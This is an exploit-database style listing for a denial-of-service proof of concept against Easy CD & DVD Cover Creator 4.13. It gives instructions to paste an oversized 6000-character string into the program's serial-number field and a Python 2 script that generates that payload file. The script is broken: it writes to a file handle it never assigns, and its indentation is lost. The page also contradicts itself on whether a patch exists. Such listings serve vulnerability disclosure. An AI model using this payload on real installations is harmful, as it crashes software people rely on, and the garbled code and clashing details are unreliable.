Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)

vendor:

Easy CD & DVD Cover Creator

by:

Achilles

5.5

CVSS

MEDIUM

Denial of Service

400

CWE

Product Name: Easy CD & DVD Cover Creator

Affected Version From: 4.13

Affected Version To: 4.13

Patch Exists: NO

Related CWE:

CPE: a:easy_cd_&_dvd_cover_creator:4.13

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 x64 Sp1

2020

Easy CD & DVD Cover Creator 4.13 – Denial of Service (PoC)

The Easy CD & DVD Cover Creator 4.13 software is vulnerable to a denial of service attack. By providing a specially crafted payload, an attacker can cause the application to crash.

Mitigation:

Update to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title: Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
# Date: 22.12.2020
# Software Link:  http://www.tucows.com/download/windows/files/ezcdsetup.exe
# Exploit Author: Achilles
# Tested Version: 4.13
# Tested on: Windows 7 x64 Sp1

# 1.- Run python code :Creator.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Easy CD & DVD Cover Creator.exe
# 4.- Press Unlock Now
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number'
# 5.- Press 'Continue'and you will see a crash.

#!/usr/bin/env python
buffer = "\x41" * 6000

try:
open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"